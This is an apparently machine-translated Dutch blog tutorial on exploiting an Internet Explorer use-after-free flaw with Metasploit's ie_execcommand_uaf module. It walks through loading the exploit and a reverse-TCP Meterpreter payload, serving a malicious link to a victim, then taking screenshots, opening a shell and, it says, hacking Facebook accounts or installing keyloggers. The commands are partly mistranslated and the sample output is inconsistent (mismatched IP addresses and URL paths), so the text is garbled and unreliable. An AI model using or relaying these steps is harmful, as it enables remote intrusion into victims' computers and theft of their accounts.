Maak gebruik van Internet Explorer 0day-fout met Metasploit

Posted by Ahmed EL JAOUARI 12 jaar geleden 3 minuten om te lezen
hoe gebruik je internet explorer 0day-fout met metasploit
hoe gebruik je internet explorer 0day-fout met metasploit

Laatst bijgewerkt: 17 mei 2024

Er is zojuist een nieuw beveiligingsprobleem ontdekt in Internet Explorer. Dit is een 0day-exploit, waarmee een aanvaller verbinding kan maken met een externe machine. Versies 6 tot 9 van de Internet Explorer-browser hebben last van het probleem, behalve dat versie 10 niet wordt beïnvloed.

We zijn benieuwd hoe lang het gaat duren Microsoft om een ​​patch voor te stellen, terwijl meer dan 32% internetgebruikers gebruik de Internet Explorer-browser.

In de tussentijd zullen we zien hoe we deze fout kunnen misbruiken met Metasploit Framework.

De module waarmee deze fout kan worden uitgebuit, staat bekend als “ ie_execcommand_uaf ".

Hier zijn de commando's die je in Metasploit kunt gebruiken (hier: 192.168.1.2 is de server van de hacker, dus jij):

 

msf > svn up (voor Metasploit-update)
msf > gebruik exploit/windows/browser/ie_execcommand_uaf
msf > payload instellen windows/meterpreter/reverse_tcp

Hier laden we de “reverse_tcp” payload. Dit stukje shellcode wordt op de doelmachine uitgevoerd zodra de kwetsbaarheid is misbruikt. Er wordt dan een omgekeerde TCP-verbinding geïnitialiseerd waarmee u een sessie op afstand kunt openen (zelfs via een firewall).

msf > stel lhost 192.168.1.2 in
msf > stel srvhost 192.168.1.2 in
msf > set uripath games (dit is de URL die voor de exploit wordt gebruikt)

Als de module correct is geconfigureerd, kunnen we de aanval lanceren:

msf >exploit
[*] Reverse handler gestart op 192.168.1.100:4444
[*] URL gebruiken: http://192.168.1.2:8080/games
...

Er wordt dan een tijdelijke webserver gestart. Vervolgens moet u het adres van de pagina (http://192.168.1.2:8080/jeux) naar een slachtoffer sturen. Als ze op de link klikt, Metasploit zal je zoiets vertellen:

Het enige dat we nu hoeven te doen is een externe sessie op de machine openen met het commando:

 

msf > sessies -i 1
[*] Interactie starten met 1

Nu kun je doen wat je wilt, zoals een screenshot van het bureaublad maken:

meterpreter > gebruik spion
Extensie laden espi…succes.
meterpreter > screenshot capture.bmp

Of open een MS-DOS-dialoogvenster:

meterpreter > shell
Proces 892 gemaakt.
Kanaal 1 gemaakt.
Microsoft Windows XP [Versie 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:Documenten en instellingenAhmedDesktop>

of een Facebook-account hacken. Kortom, we kunnen echt doen wat we willen op het systeem (de pc uitzetten, een keylogger instellen, enz.).

Als je deze tutorial leuk vond, abonnez-vous à notre nieuwsbrief of volg ons op Google Nieuws zodat je niets mist! Ook kunt u ons steunen door ons een kopje koffie ☕️ aan te bieden. Bedankt voor je ondersteuning !

Degenen die deze tutorial leuk vonden, vonden deze ook leuk: